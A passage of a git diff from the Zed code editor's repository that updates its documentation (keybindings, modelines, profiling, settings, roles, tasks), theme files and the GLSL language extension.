Rely on your language server's "find references" (`Alt+F7`) for navigation—it works, just without framework context +- Use grep and file search liberally. {#kb pane::DeploySearch} with a regex can find component definitions, route configurations, or API endpoints. +- Rely on your language server's "find references" ({#kb:jetbrains editor::FindAllReferences}) for navigation—it works, just without framework context - Consider using framework-specific CLI tools (`ng`, `next`, `vite`) from Zed's terminal - For React, JSX/TSX syntax and TypeScript types still provide good intelligence @@ -232,16 +225,16 @@ Zed has none of this built-in. The TypeScript language server sees your code as ### Tool Windows vs. Docks -WebStorm organizes auxiliary views into numbered tool windows (Project = 1, npm = Alt+F11, Terminal = Alt+F12, etc.). Zed uses a similar concept called "docks": +WebStorm organizes auxiliary views into numbered tool windows. Zed uses a similar concept called "docks": -| WebStorm Tool Window | Zed Equivalent | Shortcut (JetBrains keymap) | -| -------------------- | -------------- | --------------------------- | -| Project (1) | Project Panel | `Cmd + 1` | -| Git (9 or Cmd+0) | Git Panel | `Cmd + 0` | -| Terminal (Alt+F12) | Terminal Panel | `Alt + F12` | -| Structure (7) | Outline Panel | `Cmd + 7` | -| Problems (6) | Diagnostics | `Cmd + 6` | -| Debug (5) | Debug Panel | `Cmd + 5` | +| WebStorm Tool Window | Zed Equivalent | Zed Keybinding | +| -------------------- | -------------- | ------------------------------------------ | +| Project | Project Panel | {#kb:jetbrains project_panel::ToggleFocus} | +| Git | Git Panel | {#kb:jetbrains git_panel::ToggleFocus} | +| Terminal | Terminal Panel | {#kb:jetbrains terminal_panel::Toggle} | +| Structure | Outline Panel | {#kb:jetbrains outline_panel::ToggleFocus} | +| Problems | Diagnostics | {#kb:jetbrains diagnostics::Deploy} | +| Debug | Debug Panel | {#kb:jetbrains debug_panel::ToggleFocus} | Zed has three dock positions: left, bottom, and right. Panels can be moved between docks by dragging or through settings. @@ -252,10 +245,10 @@ Note that there's no dedicated npm tool window in Zed. Use the terminal or defin Both WebStorm and Zed offer integrated debugging for JavaScript and TypeScript: - Zed uses `vscode-js-debug` (the same debug adapter that VS Code uses) -- Set breakpoints with `Ctrl+F8` -- Start debugging with `Alt+Shift+F9` or press `F4` and select a debug target -- Step through code with `F7` (step into), `F8` (step over), `Shift+F8` (step out) -- Continue execution with `F9` +- Set breakpoints with {#kb:jetbrains editor::ToggleBreakpoint} +- Start debugging with {#kb:jetbrains debugger::Start} +- Step through code with {#kb:jetbrains debugger::StepInto} (step into), {#kb:jetbrains debugger::StepOver} (step over), {#kb:jetbrains debugger::StepOut} (step out) +- Continue execution with {#kb:jetbrains debugger::Continue} Zed can debug: @@ -318,7 +311,6 @@ Zed's extension catalog is smaller and more focused: - Language support and syntax highlighting - Themes -- Slash commands for AI - Context servers Several features that require plugins in WebStorm are built into Zed: @@ -359,7 +351,7 @@ If you're used to AI assistants in WebStorm (like GitHub Copilot, JetBrains AI A ### Configuring GitHub Copilot -1. Open Settings with `Cmd+,` (macOS) or `Ctrl+,` (Linux/Windows) +1. Open Settings with {#kb zed::OpenSettings} 2. Navigate to **AI → Edit Predictions** 3. Click **Configure** next to "Configure Providers" 4. Under **GitHub Copilot**, click **Sign in to GitHub** diff --git a/docs/src/modelines.md b/docs/src/modelines.md new file mode 100644 index 0000000000000000000000000000000000000000..541e44b7bae4a1fb8b4400245c2e0bf54b68dcfb --- /dev/null +++ b/docs/src/modelines.md @@ -0,0 +1,67 @@ +# Modelines + +Modelines are special comments at the beginning or end of a file that configure editor settings for that specific file. Zed supports both Vim and Emacs modeline formats, allowing you to specify settings like tab size, indentation style, and file type directly within your files. + +## Configuration + +Use the [`modeline_lines`](./reference/all-settings.md#modeline-lines) setting to control how many lines Zed searches for modelines: + +```json [settings] +{ + "modeline_lines": 5 +} +``` + +Set to `0` to disable modeline parsing entirely. + +## Emacs + +Zed has some compatibility support for [Emacs file variables](https://www.gnu.org/software/emacs/manual/html_node/emacs/Specifying-File-Variables.html). + +Example: + +```python +# -*- mode: python; tab-width: 4; indent-tabs-mode: nil; -*- +``` + +### Supported Emacs Variables + +| Variable | Description | Zed Setting | +| -------------------------- | ------------------------------ | ------------------------------------------------------------------------------------------ | +| `mode` | Major mode/language | Language detection | +| `tab-width` | Tab display width | [`tab_size`](./reference/all-settings.md#tab-size) | +| `fill-column` | Line wrap column | [`preferred_line_length`](./reference/all-settings.md#preferred-line-length) | +| `indent-tabs-mode` | `nil` for spaces, `t` for tabs | [`hard_tabs`](./reference/all-settings.md#hard-tabs) | +| `electric-indent-mode` | Auto-indentation | [`auto_indent`](./reference/all-settings.md#auto-indent) | +| `require-final-newline` | Ensure final newline | [`ensure_final_newline_on_save`](./reference/all-settings.md#ensure-final-newline-on-save) | +| `show-trailing-whitespace` | Show trailing whitespace | [`show_whitespaces`](./reference/all-settings.md#show-whitespaces) | + +## Vim + +Zed has some compatibility support for [Vim modeline](https://vimhelp.org/options.txt.html#modeline). + +Example: + +```python +# vim: set ft=python ts=4 sw=4 et: +``` + +### Supported Vim Options + +| Option | Aliases | Description | Zed Setting | +| -------------- | ------- | --------------------------------- | ------------------------------------------------------------------------------------------ | +| `filetype` | `ft` | File type/language | Language detection | +| `tabstop` | `ts` | Number of spaces a tab counts for | [`tab_size`](./reference/all-settings.md#tab-size) | +| `textwidth` | `tw` | Maximum line width | [`preferred_line_length`](./reference/all-settings.md#preferred-line-length) | +| `expandtab` | `et` | Use spaces instead of tabs | [`hard_tabs`](./reference/all-settings.md#hard-tabs) | +| `noexpandtab` | `noet` | Use tabs instead of spaces | [`hard_tabs`](./reference/all-settings.md#hard-tabs) | +| `autoindent` | `ai` | Enable auto-indentation | [`auto_indent`](./reference/all-settings.md#auto-indent) | +| `noautoindent` | `noai` | Disable auto-indentation | [`auto_indent`](./reference/all-settings.md#auto-indent) | +| `endofline` | `eol` | Ensure final newline | [`ensure_final_newline_on_save`](./reference/all-settings.md#ensure-final-newline-on-save) | +| `noendofline` | `noeol` | Disable final newline | [`ensure_final_newline_on_save`](./reference/all-settings.md#ensure-final-newline-on-save) | + +## Notes + +- The first kilobyte of a file is searched for modelines. +- Emacs modelines take precedence over Vim modelines when both are present. +- Modelines in the first few lines take precedence over those at the end of the file. diff --git a/docs/src/outline-panel.md b/docs/src/outline-panel.md index 1bacc3cacf4f556c9c3a06e59d6f3fac9b8c74b0..7b31725bf2cec844881e0c5b0b41aac864e28fc9 100644 --- a/docs/src/outline-panel.md +++ b/docs/src/outline-panel.md @@ -7,8 +7,6 @@ description: Navigate code structure with Zed's outline panel. View symbols, jum In addition to the modal outline (`cmd-shift-o`), Zed offers an outline panel. The outline panel can be deployed via `cmd-shift-b` (`outline panel: toggle focus` via the command palette), or by clicking the `Outline Panel` button in the status bar. -> **Changed in Preview (v0.225).** See [release notes](/releases#0.225). - When viewing a "singleton" buffer (i.e., a single file on a tab), the outline panel works similarly to that of the outline modal-it displays the outline of the current buffer's symbols. Each symbol entry shows its type prefix (such as "struct", "fn", "mod", "impl") along with the symbol name, helping you quickly identify what kind of symbol you're looking at. Clicking on an entry allows you to jump to the associated section in the file. The outline view will also automatically scroll to the section associated with the current cursor position within the file. ![Using the outline panel in a singleton buffer](https://zed.dev/img/outline-panel/singleton.png) diff --git a/docs/src/performance.md b/docs/src/performance.md index 09abecdeffe4e268413a73b189ef301511b1a20e..d25ac246f3dbc03ba4286f8e130c566657bbf196 100644 --- a/docs/src/performance.md +++ b/docs/src/performance.md @@ -15,7 +15,7 @@ See [samply](https://github.com/mstange/samply)'s README on how to install and r The profile.json does not contain any symbols. Firefox profiler can add the local symbols to the profile for for. To do that hit the upload local profile button in the top right corner. -image +image # In depth CPU profiling (Tracing) @@ -52,10 +52,47 @@ Download the profiler: ## Usage Open the profiler (tracy-profiler), you should see zed in the list of `Discovered clients` click it. -image -To find functions that take a long time follow this image: -image +image + +Tracy is an incredibly powerful profiler which can do a lot however it's UI is not that friendly. This is not the place for an in depth guide to Tracy, I do however want to highlight one particular workflow that is helpful when figuring out why a piece of code is _sometimes_ slow. + +Here are the steps: + +1. Click the flamechart button at the top. + +Click flamechart + +2. Click on a function that takes a lot of time. + +Click snapshot + +3. Expand the list of function calls by clicking on main thread. + +Click main thread + +4. Filter that list to the slower calls then click on one of the slow calls in the list + +Select the tail calls in the histogram to filter down the list of calls then click on one call + +5. Click zoom to zone to go to that specific function call in the timeline + +Click zoom to zone + +6. Scroll to zoom in and see more detail about the callers + +Scroll to zoom in + +7. Click on a caller to to get statistics on _it_. + +Click on any of the zones to get statistics + +While normally the blue bars in the Tracy timeline correspond to function calls they can time any part of a codebase. In the example below we have added an extra span "for block in edits" and added metadata to it: the block_height. You can do that like this: + +```rust +let span = ztracing::debug_span!("for block in edits", block_height = block.height()); +let _enter = span.enter(); // span guard, when this is dropped the span ends (and its duration is recorded) +``` # Task/Async profiling @@ -78,7 +115,7 @@ Download the importer - `cd import && mkdir build && cd build` - Run cmake to generate build files: `cmake -G Ninja -DCMAKE_BUILD_TYPE=Release ..` - Build the importer: `ninja` -- Run the importer on the trace file: `./tracy-import-miniprofiler /path/to/trace.miniprof /path/to/output.tracy` +- Run the importer on the trace file: `./tracy-import-miniprofiler /path/to/trace.miniprof.json /path/to/output.tracy` - Open the trace in tracy: - If you're on windows download the v0.12.2 version from the releases on the upstream repo - If you're on other platforms open it on the website: https://tracy.nereid.pl/ (the version might mismatch so your luck might vary, we need to host our own ideally..) @@ -87,7 +124,7 @@ Download the importer - Run the action: `zed open performance profiler` - Hit the save button. This opens a save dialog or if that fails to open the trace gets saved in your working directory. -- Convert the profile so it can be imported in tracy using the importer: `./tracy-import-miniprofiler output.tracy` +- Convert the profile so it can be imported in tracy using the importer: `./tracy-import-miniprofiler output.tracy` - Go to hit the 'power button' in the top left and then open saved trace. - Now zoom in to see the tasks and how long they took diff --git a/docs/src/reference/all-settings.md b/docs/src/reference/all-settings.md index 23b59f0b91002c0a920df0df8d61088652281735..3c944e0807ff1a6b0cda46c3416ad4e2dbc5a279 100644 --- a/docs/src/reference/all-settings.md +++ b/docs/src/reference/all-settings.md @@ -1800,17 +1800,7 @@ While other options may be changed at a runtime and should be placed under `sett } ``` -3. Use Supermaven as the edit prediction provider: - -```json [settings] -{ - "edit_predictions": { - "provider": "supermaven" - } -} -``` - -4. Turn off edit predictions across all providers +3. Turn off edit predictions across all providers ```json [settings] { @@ -1918,6 +1908,14 @@ WARNING: `{buffer_path}` should not be used to direct your formatter to read fro Here `rust-analyzer` will be used first to format the code, followed by a call of sed. If any of the formatters fails, the subsequent ones will still be executed. +6. To disable the formatter, use `"none"`. This setting disables the configured formatter, but any actions in `code_actions_on_format` will still be executed: + +```json [settings] +{ + "formatter": "none" +} +``` + ## Auto close - Description: Whether to automatically add matching closing characters when typing opening parenthesis, bracket, brace, single or double quote characters. @@ -3004,21 +3002,36 @@ If you wish to exclude certain hosts from using the proxy, set the `NO_PROXY` en ## Profiles -- Description: Configuration profiles that can be applied on top of existing settings +- Description: Configuration profiles that can be temporarily applied on top of existing settings or Zed's defaults. - Setting: `profiles` - Default: `{}` **Options** -Configuration object for defining settings profiles. Example: +Each profile is an object with the following optional fields: + +- `base`: What settings to start from before applying the profile's overrides. + - `"user"` (default): Apply on top of your current user settings. + - `"default"`: Apply on top of Zed's default settings, ignoring user customizations. +- `settings`: The settings overrides for this profile. + +Examples: ```json [settings] { "profiles": { - "presentation": { - "buffer_font_size": 20, - "ui_font_size": 18, - "theme": "One Light" + "Presentation": { + "settings": { + "buffer_font_size": 20, + "ui_font_size": 18, + "theme": "One Light" + } + }, + "Clean Slate": { + "base": "default", + "settings": { + "theme": "Ayu Dark" + } } } } @@ -3464,12 +3477,6 @@ Non-negative `integer` values - Setting: `regex` - Default: `false` -### Search On Input - -- Description: Whether to search on input in project search. -- Setting: `search_on_input` -- Default: `true` - ### Center On Match - Description: Whether to center the cursor on each search match when navigating. @@ -4629,7 +4636,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a "show_user_picture": true, "show_user_menu": true, "show_sign_in": true, - "show_menus": false + "show_menus": false, + "button_layout": "platform_default" } } ``` @@ -4644,6 +4652,7 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a - `show_user_menu`: Whether to show the user menu button in the titlebar (the one that displays your avatar by default and contains options like Settings, Keymap, Themes, etc.) - `show_sign_in`: Whether to show the sign in button in the titlebar - `show_menus`: Whether to show the menus in the titlebar +- `button_layout`: The layout of window control buttons in the title bar (Linux only). Can be set to `"platform_default"` to follow the system setting, `"standard"` to use Zed's built-in layout, or a custom format like `"close:minimize,maximize"` ## Vim @@ -4705,7 +4714,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a "bold_folder_labels": false, "drag_and_drop": true, "scrollbar": { - "show": null + "show": null, + "horizontal_scroll": true }, "sticky_scroll": true, "show_diagnostics": "all", @@ -4951,9 +4961,9 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a } ``` -### Scrollbar: Show +### Scrollbar -- Description: Whether to show a scrollbar in the project panel. Possible values: null, "auto", "system", "always", "never". Inherits editor settings when absent, see its description for more details. +- Description: Scrollbar-related settings for the project panel. - Setting: `scrollbar` - Default: @@ -4961,7 +4971,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a { "project_panel": { "scrollbar": { - "show": null + "show": null, + "horizontal_scroll": true } } } @@ -4969,29 +4980,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a **Options** -1. Show scrollbar in the project panel - -```json [settings] -{ - "project_panel": { - "scrollbar": { - "show": "always" - } - } -} -``` - -2. Hide scrollbar in the project panel - -```json [settings] -{ - "project_panel": { - "scrollbar": { - "show": "never" - } - } -} -``` +- `show`: Whether to show a scrollbar in the project panel. Possible values: null, "auto", "system", "always", "never". Inherits editor settings when absent, see its description for more details. +- `horizontal_scroll`: Whether to allow horizontal scrolling in the project panel. When `false`, the view is locked to the leftmost position and long file names are clipped. ### Sort Mode @@ -5118,7 +5108,8 @@ See the [debugger page](../debugger.md) for more information about debugging sup "collapse_untracked_diff": false, "scrollbar": { "show": null - } + }, + "starts_open": false } } ``` @@ -5133,6 +5124,7 @@ See the [debugger page](../debugger.md) for more information about debugging sup - `sort_by_path`: Whether to sort entries in the panel by path or by status (the default) - `collapse_untracked_diff`: Whether to collapse untracked files in the diff panel - `scrollbar`: When to show the scrollbar in the git panel +- `starts_open`: Whether the git panel should open on startup ## Git Worktree Directory @@ -5355,12 +5347,12 @@ For example, to use `Nerd Font` as a fallback, add the following to your setting ## Settings Profiles -- Description: Configure any number of settings profiles that are temporarily applied on top of your existing user settings when selected from `settings profile selector: toggle`. +- Description: Configure any number of settings profiles that are temporarily applied when selected from `settings profile selector: toggle`. - Setting: `profiles` - Default: `{}` In your `settings.json` file, add the `profiles` object. -Each key within this object is the name of a settings profile, and each value is an object that can include any of Zed's settings. +Each key within this object is the name of a settings profile. Each profile has an optional `base` field (`"user"` or `"default"`) and a `settings` object containing any of Zed's settings. Example: @@ -5368,24 +5360,30 @@ Example: { "profiles": { "Presenting (Dark)": { - "agent_buffer_font_size": 18.0, - "buffer_font_size": 18.0, - "theme": "One Dark", - "ui_font_size": 18.0 + "settings": { + "agent_buffer_font_size": 18.0, + "buffer_font_size": 18.0, + "theme": "One Dark", + "ui_font_size": 18.0 + } }, "Presenting (Light)": { - "agent_buffer_font_size": 18.0, - "buffer_font_size": 18.0, - "theme": "One Light", - "ui_font_size": 18.0 + "settings": { + "agent_buffer_font_size": 18.0, + "buffer_font_size": 18.0, + "theme": "One Light", + "ui_font_size": 18.0 + } }, "Writing": { - "agent_buffer_font_size": 15.0, - "buffer_font_size": 15.0, - "theme": "Catppuccin Frappé - No Italics", - "ui_font_size": 15.0, - "tab_bar": { "show": false }, - "toolbar": { "breadcrumbs": false } + "settings": { + "agent_buffer_font_size": 15.0, + "buffer_font_size": 15.0, + "theme": "Catppuccin Frappé - No Italics", + "ui_font_size": 15.0, + "tab_bar": { "show": false }, + "toolbar": { "breadcrumbs": false } + } } } } diff --git a/docs/src/roles.md b/docs/src/roles.md new file mode 100644 index 0000000000000000000000000000000000000000..6c1ce7a8928955d16f8f70c024fd4133c85837bc --- /dev/null +++ b/docs/src/roles.md @@ -0,0 +1,71 @@ +--- +title: Roles - Zed +description: Understand Zed's organization roles and what each role can access, manage, and configure. +--- + +# Roles + +Every member of a Zed organization is assigned a role that determines +what they can access and configure. + +## Role Types {#roles} + +Every member of an organization is assigned one of three roles: + +| Role | Description | +| ---------- | ------------------------------------------------------ | +| **Owner** | Full control, including billing and ownership transfer | +| **Admin** | Full control, except billing | +| **Member** | Standard access, no privileged actions | + +### Owner {#role-owner} + +An owner has full control over the organization, including: + +- Invite and remove members +- Assign and change member roles +- Manage billing, payment methods, and invoices +- Configure data-sharing policies +- Disable Zed's collaborative features +- Control whether members can use Zed-hosted models and Zed's edit predictions +- Transfer ownership to another member + +### Admin {#role-admin} + +Admins have the same capabilities as the Owner, except they cannot: + +- Access or modify billing settings +- Transfer organization ownership + +This role is suited for team leads or managers who handle day-to-day +member access without needing visibility into payment details. + +### Member {#role-member} + +Members have standard access to Zed. They cannot access billing or +organization settings. + +## Managing User Roles {#managing-users} + +Owners and Admins can manage organization members from the Zed +dashboard within the Members page. + +### Inviting Members {#inviting-members} + +1. On the Members page, select **+ Invite Member**. +2. Enter the member's company email address and choose a role. +3. The invitee receives an email with instructions to join. After + accepting, they authenticate via GitHub. + +### Changing a Member's Role {#changing-roles} + +1. On the Members page, find the member. You can filter by role or + search by name. +2. Open the three-dot menu and select a new role. + +### Removing a Member {#removing-members} + +1. On the Members page, find the member. +2. Select **Remove** and confirm. + +Removing a member removes their access to organization settings and any organization-managed features. They can continue using Zed on their own. diff --git a/docs/src/semantic-tokens.md b/docs/src/semantic-tokens.md index ab30525c504455fc7f1fa431b212b975c1d75061..d26666ca7e7e60614bd4f1f9f06e771168611de2 100644 --- a/docs/src/semantic-tokens.md +++ b/docs/src/semantic-tokens.md @@ -48,7 +48,7 @@ You can configure this globally or per-language: Semantic tokens are styled using rules that map LSP token types and modifiers to theme styles or custom colors. Zed provides sensible defaults, but you can customize these in your settings.json: add rules under `global_lsp_settings.semantic_token_rules` key. Rules are matched in order, and the first matching rule wins. -User-defined rules take precedence over defaults. +User-defined rules take highest precedence, followed by extension-provided language rules, then Zed defaults. ### Rule Structure @@ -139,7 +139,7 @@ To disable highlighting for a specific token type, add an empty rule that matche } ``` -Since user rules are prepended to defaults and the first match wins, this empty rule prevents any styling from being applied to comment tokens. +Since user rules take highest precedence and the first match wins, this empty rule prevents any styling from being applied to comment tokens. ## Default Rules diff --git a/docs/src/snippets.md b/docs/src/snippets.md index 72cbec7b20ff694304a58a70cd9b142a60fc58a2..9f6b6c880be9edcace23f0e3fd0a02263549776a 100644 --- a/docs/src/snippets.md +++ b/docs/src/snippets.md @@ -42,24 +42,4 @@ To create JSX snippets you have to use `javascript.json` snippets file, instead ## Known Limitations - Only the first prefix is used when a list of prefixes is passed in. -- Currently only the `json` snippet file format is supported, even though the `simple-completion-language-server` supports both `json` and `toml` file formats. - -## See also - -The `feature_paths` option in `simple-completion-language-server` is disabled by default. - -If you want to enable it you can add the following to your `settings.json`: - -```json [settings] -{ - "lsp": { - "snippet-completion-server": { - "settings": { - "feature_paths": true - } - } - } -} -``` - -For more configuration information, see the [`simple-completion-language-server` instructions](https://github.com/zed-industries/simple-completion-language-server/tree/main). +- Currently only the `json` snippet file format is supported. diff --git a/docs/src/tasks.md b/docs/src/tasks.md index 0fa659eb2cc58fe63536e721475b0093e0650618..3bbef85e9760ad036b75d50f26d3536b2e5b20f1 100644 --- a/docs/src/tasks.md +++ b/docs/src/tasks.md @@ -50,7 +50,12 @@ Zed supports ways to spawn (and rerun) commands using its integrated [terminal]( // Whether to show the task line in the output of the spawned task, defaults to `true`. "show_summary": true, // Whether to show the command line in the output of the spawned task, defaults to `true`. - "show_command": true + "show_command": true, + // Which edited buffers to save before running the task: + // * `all` — save all edited buffers + // * `current` — save currently active buffer only + // * `none` — don't save any buffers + "save": "none" // Represents the tags for inline runnable indicators, or spawning multiple tasks at once. // "tags": [] } @@ -89,6 +94,7 @@ These variables allow you to pull information from the current editor and use it - `ZED_STEM`: stem (filename without extension) of the currently opened file (e.g. `main`) - `ZED_SYMBOL`: currently selected symbol; should match the last symbol shown in a symbol breadcrumb (e.g. `mod tests > fn test_task_contexts`) - `ZED_SELECTED_TEXT`: currently selected text +- `ZED_LANGUAGE`: language of the currently opened buffer (e.g. `Rust`, `Python`, `Shell Script`) - `ZED_WORKTREE_ROOT`: absolute path to the root of the current worktree. (e.g. `/Users/my-user/path/to/project`) - `ZED_CUSTOM_RUST_PACKAGE`: (Rust-specific) name of the parent package of $ZED_FILE source file. @@ -225,8 +231,6 @@ This could be useful for launching a terminal application that you want to use i ## VS Code Task Format -> **Preview:** This feature is available in Zed Preview. It will be included in the next Stable release. - When importing VS Code tasks from `.vscode/tasks.json`, you can omit the `label` field. Zed automatically generates labels based on the task type: - **npm tasks**: `npm: {{/if}} + +
@@ -307,6 +309,50 @@ {{/next}}
+
@@ -378,6 +424,31 @@ + + {{/if}} @@ -407,23 +478,82 @@ {{/if}} {{/if}} - - + +
diff --git a/docs/theme/page-toc.css b/docs/theme/page-toc.css index 6a16265976c8c9d8861c2791206464f1bcb4ceec..6f88ccc429eb6f29015c26722f2b9cce49807008 100644 --- a/docs/theme/page-toc.css +++ b/docs/theme/page-toc.css @@ -5,7 +5,7 @@ display: flex; flex-direction: column; gap: 4px; - padding: 28px 0 120px 0; + padding: 16px 0 120px 0; width: 200px; max-height: calc(100svh - 50px); overflow-x: hidden; diff --git a/docs/theme/plugins.css b/docs/theme/plugins.css index 8c9f0c438e8e1ecd43cd770183d0a6a3bbfe0a4f..ef59e97072bd2c2a6e580afca79bbe3dafa37f6b 100644 --- a/docs/theme/plugins.css +++ b/docs/theme/plugins.css @@ -1,8 +1,8 @@ kbd.keybinding { background-color: var(--keybinding-bg); - padding: 2px 4px; - border-radius: 3px; - font-family: monospace; + padding: 4px 4px 6px 4px; + border-radius: 4px; + font-family: var(--mono-font); display: inline-block; margin: 0 2px; } diff --git a/extensions/README.md b/extensions/README.md index c677e0b909c0a31c53a9b91f24c317d29c182420..d705cb65fdfffbaa7a9673382a1d63dc0b5cbcc9 100644 --- a/extensions/README.md +++ b/extensions/README.md @@ -8,56 +8,10 @@ If you are looking for the Zed extension registry, see the [`zed-industries/exte Currently, Zed includes support for a number of languages without requiring installing an extension. Those languages can be found under [`crates/languages/src`](https://github.com/zed-industries/zed/tree/main/crates/languages/src). -Support for all other languages is done via extensions. This directory ([extensions/](https://github.com/zed-industries/zed/tree/main/extensions/)) contains a number of officially maintained extensions. These extensions use the same [zed_extension_api](https://docs.rs/zed_extension_api/latest/zed_extension_api/) available to all [Zed Extensions](https://zed.dev/extensions) for providing [language servers](https://zed.dev/docs/extensions/languages#language-servers), [tree-sitter grammars](https://zed.dev/docs/extensions/languages#grammar) and [tree-sitter queries](https://zed.dev/docs/extensions/languages#tree-sitter-queries). +Support for all other languages is done via extensions. This directory ([extensions/](https://github.com/zed-industries/zed/tree/main/extensions/)) contains some of the officially maintained extensions. These extensions use the same [zed_extension_api](https://docs.rs/zed_extension_api/latest/zed_extension_api/) available to all [Zed Extensions](https://zed.dev/extensions) for providing [language servers](https://zed.dev/docs/extensions/languages#language-servers), [tree-sitter grammars](https://zed.dev/docs/extensions/languages#grammar) and [tree-sitter queries](https://zed.dev/docs/extensions/languages#tree-sitter-queries). + +You can find the other officially maintained extensions in the [zed-extensions organization](https://github.com/zed-extensions). ## Dev Extensions See the docs for [Developing an Extension Locally](https://zed.dev/docs/extensions/developing-extensions#developing-an-extension-locally) for how to work with one of these extensions. - -## Updating - -> [!NOTE] -> This update process is usually handled by Zed staff. -> Community contributors should just submit a PR (step 1) and we'll take it from there. - -The process for updating an extension in this directory has three parts. - -1. Create a PR with your changes. (Merge it) -2. Bump the extension version in: - - - extensions/{language_name}/extension.toml - - extensions/{language_name}/Cargo.toml - - Cargo.lock - - You can do this manually, or with a script: - - ```sh - # Output the current version for a given language - ./script/language-extension-version - - # Update the version in `extension.toml` and `Cargo.toml` and trigger a `cargo check` - ./script/language-extension-version - ``` - - Commit your changes to a branch, push a PR and merge it. - -3. Open a PR to [`zed-industries/extensions`](https://github.com/zed-industries/extensions) repo that updates the extension in question - -Edit [`extensions.toml`](https://github.com/zed-industries/extensions/blob/main/extensions.toml) in the extensions repo to reflect the new version you set above and update the submodule latest Zed commit. - -```sh -# Go into your clone of the extensions repo -cd ../extensions - -# Update -git checkout main -git pull -just init-submodule extensions/zed - -# Update the Zed submodule -cd extensions/zed -git checkout main -git pull -cd - -git add extensions.toml extensions/zed -``` diff --git a/extensions/glsl/Cargo.toml b/extensions/glsl/Cargo.toml index fd39ac82debb3eabf78219a730e090c002c88395..a02c93c0387424255fa32abf8fb027e2d923b809 100644 --- a/extensions/glsl/Cargo.toml +++ b/extensions/glsl/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "zed_glsl" -version = "0.2.0" +version = "0.2.3" edition.workspace = true publish.workspace = true license = "Apache-2.0" diff --git a/extensions/glsl/extension.toml b/extensions/glsl/extension.toml index 867b679ea6b9cf0f42e87938e85b5b69bbd435e3..1fcc888ebdfc14b1fb94d136c99e2ef6b7008b94 100644 --- a/extensions/glsl/extension.toml +++ b/extensions/glsl/extension.toml @@ -1,7 +1,7 @@ id = "glsl" name = "GLSL" description = "GLSL support." -version = "0.2.0" +version = "0.2.3" schema_version = 1 authors = ["Mikayla Maki "] repository = "https://github.com/zed-industries/zed" diff --git a/extensions/glsl/languages/glsl/brackets.scm b/extensions/glsl/languages/glsl/brackets.scm index 62e137ef2629f3b7f7aeafbad419a36d19361d19..e83d67f411a71f2602dc774531d904a949c45b9a 100644 --- a/extensions/glsl/languages/glsl/brackets.scm +++ b/extensions/glsl/languages/glsl/brackets.scm @@ -1,3 +1,8 @@ -("[" @open "]" @close) -("{" @open "}" @close) -("(" @open ")" @close) +("[" @open + "]" @close) + +("{" @open + "}" @close) + +("(" @open + ")" @close) diff --git a/extensions/glsl/languages/glsl/config.toml b/extensions/glsl/languages/glsl/config.toml index 0c71419c91e40f4b5fc65c10c882ac5c542a080c..ecb1a43f6803e40cd7e2bf003be5c32066dae3fd 100644 --- a/extensions/glsl/languages/glsl/config.toml +++ b/extensions/glsl/languages/glsl/config.toml @@ -5,6 +5,8 @@ path_suffixes = [ "vert", "frag", "tesc", "tese", "geom", # Compute shaders "comp", + # Mesh pipeline shaders + "task", "mesh", # Ray tracing pipeline shaders "rgen", "rint", "rahit", "rchit", "rmiss", "rcall", # Other diff --git a/extensions/glsl/languages/glsl/highlights.scm b/extensions/glsl/languages/glsl/highlights.scm index 09f94d4fb587963254c9bc31ec25b66a0e1e4323..0509d0f5ef00977a8f809baa4684a09628dd0172 100644 --- a/extensions/glsl/languages/glsl/highlights.scm +++ b/extensions/glsl/languages/glsl/highlights.scm @@ -1,82 +1,96 @@ -"break" @keyword -"case" @keyword -"const" @keyword -"continue" @keyword -"default" @keyword -"do" @keyword -"else" @keyword -"enum" @keyword -"extern" @keyword -"for" @keyword -"if" @keyword -"inline" @keyword -"return" @keyword -"sizeof" @keyword -"static" @keyword -"struct" @keyword -"switch" @keyword -"typedef" @keyword -"union" @keyword -"volatile" @keyword -"while" @keyword - -"#define" @keyword -"#elif" @keyword -"#else" @keyword -"#endif" @keyword -"#if" @keyword -"#ifdef" @keyword -"#ifndef" @keyword -"#include" @keyword -(preproc_directive) @keyword - -"--" @operator -"-" @operator -"-=" @operator -"->" @operator -"=" @operator -"!=" @operator -"*" @operator -"&" @operator -"&&" @operator -"+" @operator -"++" @operator -"+=" @operator -"<" @operator -"==" @operator -">" @operator -"||" @operator - -"." @delimiter -";" @delimiter - -(string_literal) @string -(system_lib_string) @string - -(null) @constant -(number_literal) @number -(char_literal) @number +[ + "break" + "case" + "const" + "continue" + "default" + "do" + "else" + "enum" + "extern" + "for" + "if" + "inline" + "return" + "sizeof" + "static" + "struct" + "switch" + "typedef" + "union" + "volatile" + "while" + "#define" + "#elif" + "#else" + "#endif" + "#if" + "#ifdef" + "#ifndef" + "#include" + (preproc_directive) +] @keyword + +[ + "--" + "-" + "-=" + "->" + "=" + "!=" + "*" + "&" + "&&" + "+" + "++" + "+=" + "<" + "==" + ">" + "||" + "." + ";" +] @operator + +[ + (string_literal) + (system_lib_string) +] @string + +(null) @constant.builtin + +[ + (number_literal) + (char_literal) +] @number (identifier) @variable (field_identifier) @property + (statement_identifier) @label -(type_identifier) @type -(primitive_type) @type -(sized_type_specifier) @type + +[ + (type_identifier) + (primitive_type) + (sized_type_specifier) +] @type (call_expression function: (identifier) @function) + (call_expression function: (field_expression field: (field_identifier) @function)) + (function_declarator declarator: (identifier) @function) + (preproc_function_def name: (identifier) @function.special) ((identifier) @constant - (#match? @constant "^[A-Z][A-Z\\d_]*$")) + (#match? @constant "^[A-Z][A-Z\\d_]*$")) (comment) @comment @@ -111,7 +125,5 @@ (extension_storage_class) @storageclass -( - (identifier) @variable.builtin - (#match? @variable.builtin "^gl_") -) +((identifier) @variable.builtin + (#match? @variable.builtin "^gl_")) diff --git a/extensions/glsl/languages/glsl/injections.scm b/extensions/glsl/languages/glsl/injections.scm new file mode 100644 index 0000000000000000000000000000000000000000..2f0e58eb6431515b86b6042e5828263341513e99 --- /dev/null +++ b/extensions/glsl/languages/glsl/injections.scm @@ -0,0 +1,2 @@ +((comment) @injection.content + (#set! injection.language "comment")) diff --git a/extensions/html/Cargo.toml b/extensions/html/Cargo.toml index 2c89f86cb450b7ea8476bffdff003a94b137d213..aefe0eb120b9e277d57212a9062fd2f899a08a09 100644 --- a/extensions/html/Cargo.toml +++ b/extensions/html/Cargo.toml @@ -1,6 +1,6 